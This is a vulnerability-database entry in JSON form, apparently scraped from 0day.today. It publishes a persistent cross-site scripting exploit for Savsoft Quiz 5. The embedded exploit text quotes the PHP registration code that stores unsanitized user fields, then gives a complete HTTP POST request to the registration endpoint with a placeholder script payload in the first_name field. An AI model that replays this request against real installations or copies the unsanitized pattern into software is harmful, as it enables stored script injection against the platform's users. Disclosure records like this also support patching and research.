Description
Exploit for the PHP platform, in the web applications category.
{"id": "1337DAY-ID-34664", "type": "zdt", "bulletinFamily": "exploit", "title": "Savsoft Quiz 5 - Persistent Cross-Site Scripting Vulnerability", "description": "Exploit for php platform in category web applications", "published": "2020-07-10T00:00:00", "modified": "2020-07-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/34664", "reporter": "th3d1gger", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2020-07-19T17:56:46", "viewCount": 120, "enchantments": {"dependencies": {}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "sourceHref": "https://0day.today/exploit/34664", "sourceData": "# Exploit Title: Savsoft Quiz 5 - Persistent Cross-Site Scripting\r\n# Exploit Author: Ogulcan Unveren(th3d1gger)\r\n# Vendor Homepage: https://savsoftquiz.com/\r\n# Software Link: https://github.com/savsofts/savsoftquiz_v5.git\r\n# Version: 5.0\r\n# Tested on: Kali Linux\r\n\r\n---Vulnerable Source Code----\r\n function insert_user_2(){\r\n\r\n\t\t$userdata=array(\r\n\t\t'email'=>$this->input->post('email'),\r\n\t\t'password'=>md5($this->input->post('password')),\r\n\t\t'first_name'=>$this->input->post('first_name'),\r\n\t\t'last_name'=>$this->input->post('last_name'),\r\n\t\t'contact_no'=>$this->input->post('contact_no'),\r\n\t\t'gid'=>implode(',',$this->input->post('gid')),\r\n\t\t'su'=>'2'\r\n\t\t);\r\n\t\t$veri_code=rand('1111','9999');\r\n\t\t if($this->config->item('verify_email')){\r\n\t\t\t$userdata['verify_code']=$veri_code;\r\n\t\t }\r\n\t\t 
\t\tif($this->session->userdata('logged_in_raw')){\r\n\t\t\t\t\t$userraw=$this->session->userdata('logged_in_raw');\r\n\t\t\t\t\t$userraw_uid=$userraw['uid'];\r\n\t\t\t\t\t$this->db->where('uid',$userraw_uid);\r\n\t\t\t\t$rresult=$this->db->update('savsoft_users',$userdata);\r\n\t\t\t\tif($this->session->userdata('logged_in_raw')){\r\n\t\t\t\t$this->session->unset_userdata('logged_in_raw');\r\n\t\t\t\t}\r\n\t\t\t\t}else{\r\n\r\n\t\t$rresult=$this->db->insert('savsoft_users',$userdata);\r\n\t\t$uid=$this->db->insert_id();\r\n\t\tforeach($_POST['custom'] as $ck => $cv){\r\n\t\t\tif($cv != ''){\r\n\t\t$savsoft_users_custom=array(\r\n\t\t'field_id'=>$ck,\r\n\t\t'uid'=>$uid,\r\n\t\t'field_values'=>$cv\r\n\t\t);\r\n\t\t$this->db->insert('savsoft_users_custom',$savsoft_users_custom);\r\n\t\t\t}\r\n\t\t}\r\n\r\n\r\n\r\n\r\n----Vulnerable Request---\r\nPOST /index.php/login/insert_user/ HTTP/1.1\r\nHost: savsoftquiz_v5\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://192.168.1.2/index.php/login/registration/\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 231\r\nConnection: close\r\nCookie: ci_session=0lhlr1iv1qgru1u1kmg42lbvj8mprokv\r\nUpgrade-Insecure-Requests: 1\r\n\r\nemail=hello%40gmail.com&password=password&first_name=XSSPAYLOAD&last_name=test&contact_no=05785555555&gid%5B%5D=1\n\n# 0day.today [2020-07-19] #", "_state": {"dependencies": 1645755294}}
{}